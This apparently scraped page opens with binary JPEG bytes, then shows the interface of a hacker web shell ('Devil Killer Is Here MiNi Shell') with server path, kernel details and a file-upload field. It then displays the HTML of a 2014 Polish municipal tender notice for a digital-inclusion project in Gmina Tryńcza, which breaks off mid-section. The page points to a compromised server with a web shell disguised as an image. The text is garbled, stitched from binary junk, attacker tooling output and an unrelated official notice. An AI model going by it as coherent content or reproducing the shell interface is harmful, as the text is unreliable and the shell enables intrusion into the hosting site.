JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140929/322024-N-2014.html

<p class="kh_header"><b>Tryńcza: Realizacja zadań wykonawcy w ramach  projektu: Budowa społeczeństwa obywatelskiego w Gminie Tryńcza</b><br>
<b>Numer ogłoszenia: 322024 - 2014; data zamieszczenia: 29.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tryńcza , Tryńcza 127, 37-204 Tryńcza, woj. podkarpackie, tel. 016 6421221, faks 016 6421221.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.tryncza.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja zadań wykonawcy w ramach  projektu: Budowa społeczeństwa obywatelskiego w Gminie Tryńcza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje realizację zadań wykonawcy w ramach Projektu Budowa społeczeństwa obywatelskiego w Gminie Tryńcza w oparciu o dofinansowanie w ramach: Programu Operacyjnego Innowacyjna Gospodarka 2007-2013; 8.Oś Priorytetowa: Społeczeństwo informacyjne - zwiększanie innowacyjności gospodarki, - Działanie 8.3: Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion.
2.	W szczególności do zadań wykonawcy przedmiotu zamówienia będzie należało pełnienie roli tzw. Operatora Wykonawczego, wykonawcy szkoleń i promocji w ramach realizacji przedmiotowego Projektu.
Do zadań wykonawcy przedmiotu zamówienia będzie należało:
1.	Realizacja obowiązków Operatora Wykonawczego;
2.	Realizacji zadań promocyjnych dla projektu;
3.	Realizacja szkoleń dla beneficjentów uczestniczących w projekcie;
4.	Adaptacja pomieszczeń dla celów instalacji sprzętu objętego projektem wraz z wykonaniem prac instalacyjnych oraz dostawą niezbędnych materiałów i wyposażenia;

W szczególności  Wykonawca będzie odpowiedzialny za wykonanie następujących zadań:
1.	Realizacja obowiązków operatora wykonawczego, w tym, 
1)	Wsparcie powołanego przez Gminę Zespołu do realizacji projektu w zarządzaniu i administrowaniu projektem, w tym:
a)	prowadzenie sprawozdawczości projektowej;
b)	bieżące monitorowanie wskaźników projektu zgodnie ze źródłami danych do prezentacji wskaźników zawartych we wniosku aplikacyjnym;
c)	przygotowywanie wniosków o płatność wynikających z harmonogramu  rzeczowo-finansowego realizacji prac;
d)	sprawowanie bieżącej kontroli poniesionych kosztów;
e)	dokonywanie analizy wykorzystania  środków finansowych;
f)	rozliczenia końcowego projektu,
2)	Bieżące informowanie  Zamawiającego o ewentualnych zagrożeniach w realizacji projektu  w stosunku do harmonogramu,
3)	Opracowywanie i przekazywanie (raportowanie) Zamawiającemu sprawozdań  miesięcznych z wykonanego zakresu  rzeczowo - finansowego zadań w ramach przedmiotu zamówienia,
4)	Wykonanie i utrzymanie strony WWW dla projektu;
Wykonawca musi zaprojektować i stworzyć stronę www (portal) dla projektu zgodnie z zaleceniami zawartymi w Przewodniku w zakresie promocji projektów finansowanych w ramach Programu Operacyjnego Innowacyjna Gospodarka, 2007 - 2013 dla beneficjentów i instytucji zaangażowanych we wdrażanie Programu.
Utworzona strona musi zawierać co najmniej następujące informacje:
- informacje ogólne dotyczące projektu i aktualności
- dane kontaktowe w sprawach technicznych i organizacyjnych
- formatka zgłoszeń
- instrukcje konfiguracyjne urządzeń użytkowników
- harmonogram szkoleń i materiały szkoleniowe
- regulamin dla uczestników projektu
- informacje na temat wizyt serwisowych
- link do strony www Gminy Tryńcza
5)	Podejmowanie działań zmierzających do odzyskania sprzętu w razie nieprawidłowego użytkowania przez odbiorców końcowych;
6)	Kontrolę wydanych zestawów komputerowych, drukarek i serwera w zakresie sprzętu,             oprogramowania dostarczonego wraz ze sprzętem, oplombowania lub innego zabezpieczenia sprzętu;
7)	Ubezpieczenie majątkowe sprzętu komputerowego i drukarek. Wykonawca po otrzymaniu świadczenia ubezpieczeniowego uzupełni utracony lub uszkodzony sprzęt;
8)	Udzielenie wsparcia technicznego użytkownikom w sprawach związanych ze sprzętem oraz oprogramowaniem dostarczonym wraz z komputerami (HelpDesk);
9)	Zapewnienie łącza dostępu do Internetu w technologii bezprzewodowej: Wifi lub Wimax, przy czym  w lokalizacjach, gdzie jest to ekonomicznie lub technologicznie konieczne i uzasadnione,  zapewnienie satelitarnego dostępu do szerokopasmowego Internetu VSAT lub  GSM/CDMA/LTE - pod warunkiem zapewnienia obydwu kanałów (odbieranie i wysyłanie) lub innej technologii oraz dostarczenie  Internetu  (z wykorzystaniem sieci istniejących operatorów)  i podłączenie go do  komputerów w 200 uprawnionych gospodarstw domowych (na terenie Gminy Tryńcza) oraz 16 jednostek podległych Gminie w lokalizacjach -wg listy adresów poniżej: 
Szkoły
1.	Zespół Szkół w Tryńczy (Gimnazjum, SP) - 20 komputerów 
2.	Zespół Szkół w Gniewczynie Łań. (Gimnazjum, SP) - 20 komputerów
3.	Zespół Szkół w Gorzycach (Gimnazjum, SP) - 20 komputerów
4.	Szkoła Podstawowa w Ubieszynie - 10 komputerów 
5.	Szkoła Podstawowa w Jagielle - 10 komputerów;

Wiejskie Domy Kultury
1.	WDK w Tryńczy  - 5 komputerów
2.	WDK w Gniewczynie Łańcuckiej - 5 komputerów
3.	WDK w Gniewczynie Trynieckiej - 5 komputerów	
4.	WDK w Gorzycach - 5 komputerów
5.	WDK w Jagielle - 5 komputerów
6.	WDK w Ubieszynie- 5 komputerów 	
7.	WDK w Wólce Ogryzkowej - 5 komputerów
8.	WDK w Wólce Małkowej - 5 komputerów
9.	WDK w Głogowcu- 5 komputerów
10.	Trynieckie Centrum Kultury - 3 komputery
11.	Biblioteka  - 3 komputery

Dokładne dane lokalizacji beneficjentów prywatnych oraz ilości zestawów komputerowych i drukarek (w przypadku zmiany ilości - przesunięcia między Jednostkami )  dla poszczególnych Jednostek zostaną wskazane przez Zamawiającego w załączniku do umowy. Lista lokalizacji beneficjentów znajduje się u Zamawiającego. Na pisemną prośbę Zamawiający udostępni adresy zainteresowanym Wykonawcom przy zapewnieniu przez Wykonawcę spełnienia warunków dotyczących przetwarzania Danych Osobowych.

Charakterystyka usługi:
W jednostkach podległych Gminie, zamawiający oczekuje podłączenia jednego łącza internetowego dla całego obiektu, które zapewni dostęp do Internetu dla wszystkich dostarczonych do danej Jednostki zestawów komputerowych.
Uruchomienie usługi stałego dostępu do Internetu w danej wskazanej przez Zamawiającego lokalizacji nie następuje, o ile w lokalizacji tej istnieją bariery uniemożliwiające połączenie z siecią Internet (w szczególności: niekorzystne ukształtowanie terenu lub struktura materiału budowlanego lokalu pochłaniającego lub odbijającego fale radiowe  lub brak zgody właściciela lokalu na instalację infrastruktury telekomunikacyjnej). O braku możliwości podłączenia Internetu, wynikających z przyczyn o których mowa w zdaniu poprzednim, Wykonawca zawiadomi  Zamawiającego, który wskaże nową (kolejną) lokalizację. 

Parametry techniczne: 
-	stały dostęp do sieci Internet, co oznacza, zapewnienie korzystania z Internetu, a nie tylko możliwości technicznych jego podłączenia,
-	W przypadku podłączenia gospodarstw domowych:
transfer do komputera użytkownika (download) minimum 1024 kbit/s, 
transfer od komputera użytkownika (upload) minimum 512 kbit/s,
-	W przypadku jednostek podległych Gminie
transfer do jednostki podległej (download) minimum 4096 kbit/s, 
transfer od jednostki podległej (upload) minimum 1024 kbit/s,
- nielimitowana ilość przesyłanych informacji tzn. stała przepustowość niezależnie od ilości przesyłanych przez łącze danych, 
- w przypadku technologii VSAT wielkość limitu transferu danych jaką należy zapewnić dla:
   gospodarstw domowych musi być minimum 4 GB miesięcznie,
   jednostek podległych Gminie Tryńcza  musi być minimum 10 GB miesięcznie
- dostęp do Internetu z punktu widzenia Zamawiającego musi działać bezobsługowo, co oznacza, że nie jest wymagane podawanie loginów, haseł czy nr PIN aby mieć możliwość korzystania z Internetu,
Inne:
-Wykonawca jest zobowiązany do przygotowania łącza tak, aby była możliwość samodzielnego podłączenia komputerów do Internetu.
-Zamawiający zastrzega sobie możliwość przeniesienia usługi dostępu do Internetu pod inny adres w czasie trwania umowy, pozostający w granicach administracyjnych Gminy Tryńcza. Zmiana lokalizacji dotyczyć będzie nie więcej niż 15% użytkowników w trakcie realizacji projektu. Wykonawca dokona przeniesienia sprzętu, instalacji i uruchomienia stałego dostępu do Internetu w przypadku zmiany miejsca pobytu uczestnika projektu lub zmiany uczestnika projektu.
Uwaga 
Uruchomienie usługi stałego dostępu do Internetu dla zestawów komputerowych w gospodarstwach domowych i jednostkach podległych Zamawiającemu nie może nastąpić później niż 2 miesiące od daty podpisania umowy .Wykonawca musi uwzględnić w cenie ofertowej zapewnienie dostępu do Internetu w okresie realizacji projektu.
10)	Nadzór nad obsługą administrowania  i serwisowania  sieci szerokopasmowej (istniejących operatorów), której infrastruktura jest wykorzystywana w projekcie, w tym: 
a)	Kontrola ewentualnych nadużyć;  
b)	Informowanie o dostępnych usługach i ich możliwościach;
c)	Instalowanie systemu rozliczenia użytkowników za wykorzystane zasoby sieci;
d)	Zdalne konfigurowanie interfejsów sieciowych komputerów;
e)	Kontrola poprawności działania sieci poprzez monitoring zakłóceń i nieprawidłowości oraz wykrywanie awarii;
f)	Monitoring i diagnoza pracy urządzeń wspomagających;
g)	bieżące usuwanie awarii elementów i urządzeń sieci,  zainstalowanych u beneficjentów końcowych i w jednostkach podległych
h)	uruchomione telefoniczne centrum serwisowe dla uczestników projektu,  działające w godzinach co najmniej od 9.00 - do 17.00 w dni robocze
i)	Przestrzeganie zasad ochrony haseł;
j)	Reagowanie w przypadku stwierdzenia nieprawidłowego korzystania z sieci przez jej użytkowników;
k)	Wskazywanie konieczności zainstalowania odpowiednich mechanizmów ochrony i wykrywania zagrożeń sieciowych;
l)	Zarządzanie adresacją sieci;
m)	Zmiana w konfiguracji urządzeń i systemów sieciowych oraz ich dokumentowanie na bieżąco;
n)	Archiwizowanie konfiguracji urządzeń i prowadzenie elektronicznej ewidencji zgłoszeń serwisowych
11)	Nadzór nad prawidłowym korzystaniem z sygnału internetowego (przeciwdziałanie nieuprawnionemu korzystaniu z sygnału);
12)	W przypadku wystąpienia awarii dostępu do Internetu, wykonawca zobowiązany jest do jej usunięcia w terminie nie dłuższym niż 1 dzień roboczy
2.	Realizacja promocji projektu, w szczególności, realizacja zadań promocyjnych zgodnie z zaleceniami zawartymi w Przewodniku w zakresie promocji projektów finansowanych w ramach Programu Operacyjnego Innowacyjna Gospodarka, 2007 - 2013 dla beneficjentów i instytucji zaangażowanych we wdrażanie Programu obejmujących: 
1)	Informację wraz z logotypem UE oraz POIG na stronach internetowych beneficjenta na temat projektu; źródła finansowania i wysokości dotacji
2)	Opracowanie i wykonanie tablicy pamiątkowej z logo UE i POIG
3)	Opracowanie i druk materiałów promocyjnych (plakaty i ulotki) w ilości : 17 sztuk -plakaty  w rozmiarze 70x90 (cm), 900 sztuk - ulotki w formacie A5 wykonanie wydruku w pełnej gamie kolorystycznej, wykonawca opracuje wraz z Zamawiającym zawartość merytoryczną ulotki i plakatu
4)	Opracowanie i druk naklejek z logo UE i POIG, w ilości : 1000 sztuk oraz umieszczenie ich na sprzęcie 
5)Zorganizowanie  konferencji inauguracyjnej dla beneficjentów projektu oraz dla pracowników Gminy
6)Ogłoszenie w mediach : zamieszczenie artykułu na całą stronę na temat projektu w prasie o zasięgu regionalnym
3.Realizacja zadań w zakresie szkoleń beneficjentów:
Organizacja i przeprowadzenie 10 szkoleń - w sumie 80 godzin szkoleniowych dla grupy docelowej beneficjentów końcowych uczestniczących w szkoleniu:
1)Zakres szkoleń: obsługa komputera, obsługa Internetu i poczty elektronicznej, dostęp do portali informacyjnych, e-aplikacje, obsługa pakietu biurowego, zasady bezpieczeństwa w sieci i programy antywirusowe.
2)	W ramach prowadzonych szkoleń jest zakup i dostarczenie każdemu uczestnikowi podręczników dostosowanych do zakresu i tematyki szkoleń oraz dyplomów w ilości  200 sztuk
3)	Szkolenia skierowane dla dzieci, młodzieży oraz osób dorosłych - odrębne wiekowe grupy szkoleniowe
4)	Wymagana liczba przeszkolonych beneficjentów końcowych: 200 osób - po jednej osobie z każdego gospodarstwa , w tym:
a)	Wymagana liczba osób niepełnosprawnych biorących udział w szkoleniu - 10
b)	Wymagana liczba dzieci i młodzieży biorących udział w szkoleniu - 80
W celu realizacji szkoleń Wykonawca zobowiązany będzie:
1)	Zapewnić wykwalifikowaną kadrę dydaktyczną do przeprowadzenia szkoleń (posiadającą uprawienia na poziomie trenera/egzaminatora ECDL lub poziomie równoważnym, tj. w obszarze zastosowań komputerów i technologii informatycznych).
2)	Przeprowadzenie szkoleń na terenie Gminy Tryńcza, w miejscu dostosowanym do potrzeb osób niepełnosprawnych (w tym toalety, podjazdy lub windy). 
3)	Zapewnić  sale szkoleniowe przystosowane do prowadzenia zajęć dydaktycznych wyposażone w niezbędne pomoce dydaktyczne, w co najmniej projektor multimedialny, ekran, tablice oraz sprzęt komputerowy wraz z niezbędnym oprogramowaniem- co najmniej 15 stanowisk. Zamawiający dopuszcza możliwość szkolenia dwóch uczestników kursu przy jednym stanowisku komputerowym.
4)	Zapewnić podczas kursu stałe łącza komputerów z Internetem.
5)	Zapewnić catering dla każdego z 200 uczestników i trenera(ów) w czasie trwania szkoleń obejmujący (na jednego uczestnika) co najmniej:
- Napoje: herbata, kawa, sok, woda mineralna - co najmniej 700 ml łącznie na osobę
- Suchy prowiant: ciastka, paluszki - co najmniej 150 g łącznie na osobę
- Owoce: jabłka, pomarańcze, banany, kiwi, mandarynki do wyboru - co najmniej 200g łącznie na osobę
- Dodatki: cukier 2 kg, śmietanka do kawy
6)	Miejsce realizacji szkoleń Wykonawca winien oznakować zgodnie z Wytycznymi w zakresie oznaczania projektów w ramach Programu Operacyjnego Innowacyjna Gospodarka na lata 2007-2013 (POIG), Oś priorytetowa 8. Społeczeństwo Informacyjne - zwiększenie innowacyjności gospodarki, działanie 8.3 Przeciwdziałanie wykluczeniu cyfrowemu e-Inclusion.
7)	Zakupić podręczniki w ilości 200 sztuk (po jednym dla  każdego uczestnika szkoleń), dostosowane do zakresu i tematyki szkoleń, zawierające opis różnych systemów operacyjnych i programów użytkowych, uwzględniając przy tym różne grupy odbiorców (młodzież, osoby niepełnosprawne, osoby starsze) 
8)	Wykonać szkolenia w nieprzekraczalnym terminie 15 dni od momentu rozpoczęcia pierwszego dnia szkoleń.
9)	Przed rozpoczęciem szkoleń wykonawca przedstawi zamawiającemu  do akceptacji opracowany szczegółowy  harmonogram (program) szkoleń - 10 dni szkoleniowych - uwzględniający dzienny czas trwania zajęć nie dłuższy niż 8 godzin (dla 2 grup szkoleniowych/wiekowych łącznie), rozpoczynających się nie wcześniej niż o godzinie 8:00 i kończących się nie później niż o godzinie 18:00. Do czasu zajęć wlicza się czas trwania przerw - do 5 minut po każdej godzinie szkolenia (max. 20 minut). 
10)	Wydać każdemu uczestnikowi szkolenia, po jego zakończeniu dyplom pamiątkowy ukończenia szkolenia współfinansowanego ze środków Programu Operacyjnego Innowacyjna Gospodarka na lata 2007-2013 (PO IG), Oś priorytetowa 8. Społeczeństwo Informacyjne - zwiększenie innowacyjności gospodarki, działanie 8.3 Przeciwdziałanie wykluczeniu cyfrowemu 
e-Inclusion.
11)	Wykonawca zobowiązany jest przekazać Zamawiającemu na zakończenie szkolenia oryginały lub kserokopie potwierdzone za zgodność, protokołu na który składają się następujące dokumenty :
- Imienne listy obecności potwierdzające ukończenie szkolenia wraz z tematami przedmiotowych zajęć szkoleniowych, zawierające informacje o miejscu, dacie i godzinach w jakich odbyło się szkolenie  oraz podpisy uczestników i trenera.  
- Listę z potwierdzeniem odbioru podręczników i dyplomów oraz odbiór cateringu przez uczestników szkolenia
- Zdjęcia wykonane podczas szkoleń - dokumentacja fotograficzna na płycie CD/DVD zawierająca co najmniej po 6 sztuk zdjęć łącznie z każdego dnia szkoleń, w każdej z grup szkoleniowych, przedstawiające uczestników podczas wykładu, pracy własnej przy komputerze oraz odbioru posiłków w przerwie kawowej.
12)	Wszystkie przygotowane dokumenty powinny być oznakowane zgodnie z Wytycznymi w zakresie oznaczania projektów w ramach Programu Operacyjnego Innowacyjna Gospodarka na lata 2007-2013 (PO IG), Oś priorytetowa 8. Społeczeństwo Informacyjne - zwiększenie innowacyjności gospodarki, działanie 8.3 Przeciwdziałanie wykluczeniu cyfrowemu e-Inclusion.
4.	Realizacja zadań w zakresie adaptacji pomieszczeń dla celów instalacji sprzętu objętego projektem: 1)	Adaptacja pomieszczeń w 16 jednostkach podległych dla celów pracowni komputerowych i instalacji w nich sprzętu objętego projektem.W celu  wykonania adaptacji pomieszczeń Wykonawca zobowiązany będzie do:
- wykonanie prac instalacyjnych, w tym niezbędnego okablowania (LAN i elektrycznego) 
- dostarczenia niezbędnych materiałów,
- innych prac niezbędnych do instalacji sprzętu objętego projektem
Realizacja powyższego zakresu zamówienia musi być wykonana w oparciu o obowiązujące przepisy, przez Wykonawcę posiadającego stosowne doświadczenie, uprawnienia i potencjał wykonawczy oraz osoby o odpowiednich kwalifikacjach i doświadczeniu zawodowym.
Ze względu na charakter zamówienia istnieje możliwość dokonanie wizji w poszczególnych lokalizacjach, celem szczegółowego zapoznania się z zakresem prac  oraz uwarunkowaniami technicznymi. Dokonanie wizji nie jest obowiązkiem wykonawcy.
Wykonawca musi ponadto uwzględnić w cenie - w ramach kosztów dodatkowych  - wszelkie pozostałe koszty związane z kompleksową realizacją zamówienia, w tym:
-koszty zużycia mediów niezbędnych na czas realizacji zadań,
-koszty zabezpieczenia istniejących elementów obiektów oraz wyposażenia (urządzeń) użytkownika przed ich zniszczeniem w trakcie wykonywania prac, 
-koszty związane z zorganizowaniem pracy w sposób minimalizujący zakłócenie prowadzenia bieżącej działalności użytkownika, - koszty uporządkowania oraz przywrócenia obiektu oraz terenu po wykonanych pracach do stanu pierwotnego wraz z naprawą ewentualnych szkód użytkownikowi lub osobom trzecim.
Wykonawca musi zorganizować pracę, zapewnić sprzęt, urządzenia i materiały oraz wykonać zakres powierzonych mu prac określonych w niniejszej specyfikacji, w szczególności zawartych w w pkt. 4, zgodnie z obowiązującymi przepisami w zakresie Bezpieczeństwa i higieny pracy (BHP) za co ponosi całkowitą odpowiedzialność..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.22.00.00-3, 72.41.30.00-8, 71.31.60.00-6, 32.42.00.00-3, 79.34.22.00-5, 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium
1. Oferta musi być zabezpieczona wadium w wysokości: 15 000,00 PLN (słownie: piętnaście tysięcy 00/100 PLN).
2.Wadium należy wnieść w terminie do dnia 07.10.2014 r do godz. 9:00
3. Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu: przelewem na rachunek bankowy Zamawiającego: BS Jarosław Filia Tryńcza Nr 2990960004200500212881001; 
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
4. Wadium wniesione :
a) w pieniądzu Zamawiający przechowuje na rachunku bankowym;
     Wniesienie wadium w pieniądzu będzie skuteczne jeżeli w podanym powyżej terminie znajdzie się na rachunku bankowym Zamawiającego.
b) Gwarancje ubezpieczeniowe lub gwarancje bankowe oraz poręczenia złożone jako zabezpieczenie wadium muszą posiadać okres ważności nie krótszy niż okres związania ofertą, (pod rygorem wykluczenia wykonawcy z postępowania) oraz umożliwiać zamawiającemu otrzymanie określonej kwoty wadium bez jakichkolwiek warunków wstępnych i na jego pierwsze wezwanie. 
Dowód wniesienia wadium winien być dołączony do oferty stanowiąc jej załącznik.
5. Wykonawca zobowiązany jest wnieść wadium na okres związania ofertą.
Brak wniesienia wadium na warunkach jak wyżej spowoduje wykluczenie wykonawcy z postępowania (art.24 ust. 2 pkt. 4 ustawy).
6.Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 z poź. zm.).
7. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
8. Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 z poź. zm.), jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
10. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 z póź. zm.), nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 zm. ), lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
